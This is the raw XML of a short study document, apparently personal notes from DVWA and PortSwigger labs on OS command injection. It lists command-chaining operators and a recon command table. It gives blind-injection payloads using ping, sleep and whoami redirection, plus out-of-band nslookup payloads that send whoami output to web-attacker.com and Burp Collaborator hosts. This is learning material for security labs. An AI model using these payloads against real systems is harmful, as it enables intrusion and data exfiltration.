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/>
          <w:iCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CMD injection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Direct os command execution at the os level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 xml:space="preserve">  </w:t>
      </w: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Below are the few operators to join the os command and execute them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>;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 xml:space="preserve">&amp;&amp;  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</w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/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&amp;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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>;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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>|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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>-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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>$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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>(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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>)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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>`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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>||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color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>The hard level problem is left http://127.0.0.1/dvwa/vulnerabilities/exec/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rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Ref: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>https://www.scribd.com/document/2530476/Php-Endangers-Remote-Code-Execution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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; echo aiwefwlguh &amp;    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Courier;monospace" w:hAnsi="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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5937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00"/>
        <w:gridCol w:w="1536"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="270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Purpose of command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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Linux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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders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Name of current user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536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whoami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whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders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Operating system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536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uname -a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ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders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Network configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536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ifconfig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ipconfig /all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders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Network connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536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netstat -an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netstat -an</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders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Running processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536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ps -ef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tasklist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eastAsia="DejaVu Sans" w:cs="DejaVu Sans"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="DejaVu Sans" w:cs="DejaVu Sans"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier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eastAsia="DejaVu Sans" w:cs="DejaVu Sans" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-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8"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Blind os command injection can be checked by the following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ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp; ping -c 10 127.0.0.1 &amp; echo “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="exploiting-blind-os-command-injection-by"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif" w:cstheme="minorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting blind OS command injection by redirecting output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif" w:cstheme="minorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>and do url encoding via ctrl+u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Courier;monospace" w:hAnsi="Courier;monospace" w:cs="" w:cstheme="minorBid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000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr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000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“&amp; whoami &gt; /var/www/static/whoami.txt &amp;”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Courier;monospace" w:hAnsi="Courier;monospace" w:cs="" w:cstheme="minorBid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000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>whoami &gt; /var/www/static/whoami.txt &amp;”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Courier;monospace" w:hAnsi="Courier;monospace" w:cs="" w:cstheme="minorBid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000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="__DdeLink__102_3889686513"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp; sleep 10 #</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/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Calibri" w:cs="" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs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IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>ctrl + U to encode the URL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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asdf&amp; whoami &gt;/var/www/images/6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.jpg &amp;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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>csrf=g2HThtIMoZXUbzyPKPRnLx066gEFKLV6&amp;name=asdf&amp;email=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>asdf%26+whoami+&gt;/var/www/images/62.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>+%26&amp;subject=a&amp;message=asd</w:t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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OAST detection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>out-of-band interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is not detectable by above command / tricks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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp; nslookup kgji2ohoyw.web-attacker.com &amp;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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Or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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp; nslookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> `whoami`.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kgji2ohoyw.web-attacker.com &amp;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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eg.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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="__DdeLink__111_3889686513"/>
      <w:bookmarkStart w:id="3" w:name="__DdeLink__106_3889686513"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; nslookup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`whoami`.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">l9vxsiupgmtqhyfl2p4khtpk8be22r.burpcollaborator.net </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ref: https://portswigger.net/web-security/os-command-injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
            <w:b w:val="false"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u w:val="none"/>
            <w:effect w:val="none"/>
          </w:rPr>
          <w:t>Find OS command injection vulnerabilities using Burp Suite's web vulnerability scanner</w:t>
        </w:r>
      </w:hyperlink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ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
            <w:b w:val="false"/>
            <w:bCs/>
            <w:i w:val="false"/>
            <w:caps w:val="false"/>
            <w:smallCaps w:val="false"/>
            <w:color w:val="000000"/>
            <w:spacing w:val="0"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp/vulnerability-scanner</w:t>
        </w:r>
      </w:hyperlink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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs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Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:bCs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ourier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">More Detail: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://portswigger.net/research/hunting-asynchronous-vulnerabilities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Arial">
    <w:altName w:val="Courier"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Arial">
    <w:altName w:val="Courier"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Courier">
    <w:altName w:val="Courier New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5b7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265b71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InternetLink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007c0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c080f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7c080f"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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ortswigger.net/burp/vulnerability-scanner" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/vulnerability-scanner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Application>LibreOffice/6.4.7.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>3</Pages>
  <Words>182</Words>
  <Characters>1378</Characters>
  <CharactersWithSpaces>1527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2023-07-04T11:23:00Z</dcterms:created>
  <dc:creator>PC</dc:creator>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-21T17:00:48Z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